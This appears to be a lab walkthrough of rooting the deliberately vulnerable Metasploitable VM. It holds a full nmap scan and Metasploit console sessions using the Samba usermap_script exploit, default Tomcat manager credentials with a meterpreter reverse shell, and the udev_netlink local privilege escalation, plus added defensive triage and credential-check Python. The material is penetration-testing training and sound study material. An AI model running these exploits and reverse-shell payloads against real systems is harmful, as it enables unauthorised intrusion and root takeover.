Metasploitable is another deliberately vulnerable VM, designed for practising penetration testing and especially Metasploit. I could have used manual methods as in the previous cases, but I decided to use Metasploit for the exploitation.
I started with Nmap as usual:
root@kali:~# nmap -sS -A 192.168.1.22
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 21:28 CET
Nmap scan report for 192.168.1.22
Host is up (0.0022s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after: 2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2013-11-09T15:28:17-05:00
TRACEROUTE
HOP RTT ADDRESS
1 2.16 ms 192.168.1.22
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds
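Before going further, here is an added example (my own code, not part of the original post) that turns the scan above into a short prioritised list: it parses the normal nmap output and maps the banners to the three things this post relies on, the old Samba, the Tomcat manager on 8180 and the 2.6 kernel. The sample input is constructed from a subset of the scan lines; the 3.0.25 cutoff is the Samba fix release and is my knowledge, not something the post states.

```python
import re

# Constructed sample: a subset of the nmap -A lines from the scan above,
# enough to exercise each triage rule below.
NMAP_OUTPUT = """\
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
OS details: Linux 2.6.9 - 2.6.33
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SAMBA_RE = re.compile(r"Samba (\d+)\.(\d+)\.(\d+)")

def parse_ports(text):
    """Map port number -> (state, service, version string) from normal nmap output."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[int(m.group(1))] = (m.group(3), m.group(4), m.group(5))
    return ports

def samba_version(text):
    """Exact Samba version from the smb-os-discovery host script, or None."""
    m = SAMBA_RE.search(text)
    return tuple(int(x) for x in m.groups()) if m else None

def triage(text):
    """Return findings that map the scan to the two methods in this post."""
    findings = []
    ports = parse_ports(text)
    ver = samba_version(text)
    # Method 1: username map script RCE; fixed upstream in Samba 3.0.25
    # (the cutoff is from the Samba fix release, not from the post).
    if ver and (3, 0, 0) <= ver < (3, 0, 25) and any(p in ports for p in (139, 445)):
        findings.append("samba %d.%d.%d: usermap_script candidate, runs as root" % ver)
    # Method 2a: Tomcat reachable; verify the manager app has no default creds.
    for port, (state, service, version) in ports.items():
        if state == "open" and "Tomcat" in version:
            findings.append("tomcat on %d: verify /manager credentials" % port)
    # Method 2b: 2.6 kernel; udev_netlink is a local-privilege candidate.
    if re.search(r"OS details: Linux 2\.6", text):
        findings.append("linux 2.6 kernel: check udev version for udev_netlink")
    return findings
```

Running `triage(NMAP_OUTPUT)` on the sample yields three findings, one per weakness the post goes on to use.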
Since everything is so easy with Metasploit, I will show two methods.
Method 1 - Samba
If we do a Google search for "Samba 3.0.20 exploit", we run into the following web page:
http://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
which is exactly the MSF module we need. Configuring and running MSF:
msf exploit(usermap_script) > set RHOST 192.168.1.22
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 192.168.1.17
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.22 yes The target address
RPORT 139 yes The target port
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.17 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > exploit
[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 1 opened (192.168.1.17:4444 -> 192.168.1.22:59321) at 2013-11-09 21:46:52 +0100
python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/#
As Samba was running with root privileges, we are done...
Method 2 - via Tomcat Manager + UDEV Netlink local exploit
There is a Tomcat service on port 8180, and if we navigate to it we find the default links to the manager, the admin page and so on. A quick Google search shows that the default Tomcat manager username and password are tomcat/tomcat. I tried it and it really worked. Now we only need the exploit:
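The default credentials are the whole weakness here, so as an added example (my own code, not from the post or from Tomcat) here is a check for the manager user database: it parses a file laid out like Tomcat's conf/tomcat-users.xml (file name and layout assumed, the post never shows it) and reports accounts that hold a manager role with a default, empty or username-equal password. The sample XML is constructed; the manager-gui and manager-script role names belong to newer Tomcat releases than the 5.5 on the VM.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout of Tomcat's conf/tomcat-users.xml
# (assumed layout; the post does not show this file).
TOMCAT_USERS_XML = """\
<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="ops" password="Qm7!v2s#Lp9wTz" roles="manager"/>
</tomcat-users>
"""

# The default pair used in the post; extend with any other vendor defaults you track.
DEFAULT_PAIRS = {("tomcat", "tomcat")}
# "manager" is the Tomcat 5.5 role; the other two names are from later releases.
MANAGER_ROLES = {"manager", "manager-gui", "manager-script"}

def weak_manager_accounts(xml_text):
    """Return usernames holding a manager role with a default, empty or trivial password."""
    root = ET.fromstring(xml_text)
    weak = []
    for user in root.iter("user"):
        name = user.get("username", "")
        pw = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        if not roles & MANAGER_ROLES:
            continue  # no manager access, so not a deploy path; out of scope here
        if (name, pw) in DEFAULT_PAIRS or pw == "" or pw == name:
            weak.append(name)
    return weak
```

On the sample only "tomcat" is reported: "both" has the default password but no manager role, and "ops" has the role but a non-default password.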
http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy
Here is the related MSF configuration:
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST 192.168.1.22 yes The target address
RPORT 8180 yes The target port
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.17 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war ...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM ...
[*] Sending stage (30355 bytes) to 192.168.1.22
[*] Meterpreter session 2 opened (192.168.1.17:4444 -> 192.168.1.22:42541) at 2013-11-09 22:06:25 +0100
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55
As we can see, we are not root yet, only the limited tomcat55 account. Let's put the Meterpreter session into the background (the 'background' command) and look for a local root exploit.
I picked the following:
http://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink
meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart use exploit/linux/local/sock_sendpage use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec use exploit/linux/local/udev_netlink
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink
msf exploit(udev_netlink) > set SESSION 3
SESSION => 3
msf exploit(udev_netlink) > show options
Module options (exploit/linux/local/udev_netlink):
Name Current Setting Required Description
---- --------------- -------- -----------
NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect
SESSION yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)
Exploit target:
Id Name
-- ----
0 Linux x86
msf exploit(udev_netlink) > exploit
[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.22:48408) at 2013-11-09 22:14:30 +0100
id
uid=0(root) gid=0(root)
...and we are root.
There are more methods, but I will leave them to you.